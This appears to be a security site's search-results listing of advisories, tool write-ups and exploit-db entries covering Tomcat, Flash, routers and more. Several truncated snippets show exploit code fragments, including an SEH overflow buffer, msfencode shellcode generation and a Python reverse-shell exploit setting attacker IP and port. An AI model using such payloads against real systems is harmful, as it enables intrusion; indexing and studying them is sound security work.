7020 matches found
[SECURITY] Fedora 22 Update: rdiff-backup-1.2.8-14.fc22
rdiff-backup is a script, written in Python, that backs up one directory to another and is intended to be run periodically (nightly from cron, for instance). The target directory ends up a copy of the source directory, but extra reverse diffs are stored in the target directory, so you can still...
Apache Tomcat 6.0.x < 6.0.40 Multiple Vulnerabilities
Binary data 8934.pasl...
Apache Tomcat 8.0.x < 8.0.4 Multiple Vulnerabilities
Binary data 8936.pasl...
Tomcat/JBossWeb: Request smuggling via malicious content length header
It was found that JBoss Web / Apache Tomcat did not check for overflowing values when parsing request content length headers. A remote attacker could use this flaw to perform an HTTP request smuggling attack on a JBoss Web / Apache Tomcat server located behind a reverse proxy that processed the...
Qt Weekly #26: Protecting your application against hacking
Open-source applications are open by nature, intended and encouraged for tweaking, hacking and further development. For a business critical application or a device there sometimes is desire to make it closed and prevent modifications. Because of the dual licensing, Qt offers a commercial license...
Reverse Shells With Terminal Support: revsh
revsh is a tool for establishing reverse shells with terminal support, reverse VPNs for advanced pivoting, as well as arbitrary data tunneling. A reverse shell is a network connection that grants shell access to a remote host. As opposed to other remote login tools such as telnet and ss...
DNS Enumeration Script: DNSRecon
DNS reconnaissance is part of the information gathering stage on a penetration test engagement. When a penetration tester is performing a DNS reconnaissance he is trying to obtain as much information as he can regarding the DNS servers and their records. The information that can be gathered can...
Analysis of Flash Zero Day Shows Layers of Obfuscation
The Flash zero day that made its way into the Angler exploit kit was wrapped in multiple layers of obfuscation and has the ability to inject its malicious payload straight into users’ browsers. In the last week, since the news broke of the Adobe Flash zero-day flaw appearing in the Angler kit,...
Oracle Secure Global Desktop Multiple Vulnerabilities (January 2015 CPU) (POODLE)
The remote host has a version of Oracle Secure Global Desktop that is version 4.63, 4.71, 5.0 or 5.1. It is, therefore, affected by multiple vulnerabilities in the following components : - Apache HTTP Server - Client - Gateway JARP module - Gateway Reverse Proxy - OpenSSL - Print Servlet only in...
Exploit Pack - Open Source Security Project for Penetration Testing and Exploit Development
Exploit Pack is an open source GPLv3 security tool; this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Impact are ready to use as well but you will require an expensive license to get access to all the...
Thunderstrike Apple Mac OS X Firmware Bootkit Unveiled
A vulnerability at the heart of Apple’s Mac OS X systems—one thus far only partially addressed by Apple—opens the door to the installation of malicious firmware bootkits that resist cleanup and give hackers persistent, stealthy control over a compromised Mac. The research is the work of a reverse...
Rosoft-media-player-4.4.4
Original Advisory:http://www.exploit-db.com/exploits/14601 - abhishek lyall Download:http://www.exploit-db.com/application/14601/ Platform:Windows XP SP3 EN Professional - VMware outputfile="exploit.m3u" junk="\x41"3470 nseh="\xeb\x88\x90\x90" reverse jump 118 bytes seh="\x49\xd4\x46\x00" PPR -...
Pirelli Router P.DG-A4001N WPA Key Reverse Engineering
!/usr/bin/env python -- coding: utf-8 -- ''' @license: GPLv3 @author : Eduardo Novella @contact: ednoloainf.upv.es @twitter: @enovella ----------------- Target : ----------------- Vendor : ADB broadband Pirelli Router : Model P.DG-A4001N ISP : Arnet Telecom Argentina Possible-targets :...
Ophcrack-3.5.0---Local-Code
Exploit Author: xisone@STM Solutions Vendor Homepage: http://ophcrack.sourceforge.net/ Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-win32-installer-3.5.0.exe Version: 3.5.0 shellcode = windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alphamixed bufferregister=esp -t c...
Sitecom-MD-25x
Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version: 2.4.17 and below...
ManageEngine-5.5
The SQL injection is possible on the "Advanced Search", the input is not validated correctly. To make it even worse, the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user, which makes a remote shell with root/SYSTEM privileges...
BigAnt-Server-2.52-SP5-SEH
Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian - expsrv.dll 6.0.9589 Info: Vulnerability...
python-socket.recvfrom_into()
Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-1912 import struct def offo: return struct.pack'L',o reverseIP = '\xc0\xa8\x04\x34' '\xc0\xa8\x01\x0a' reversePort = '\x7a\x69' shellcode from exploit-db.com,...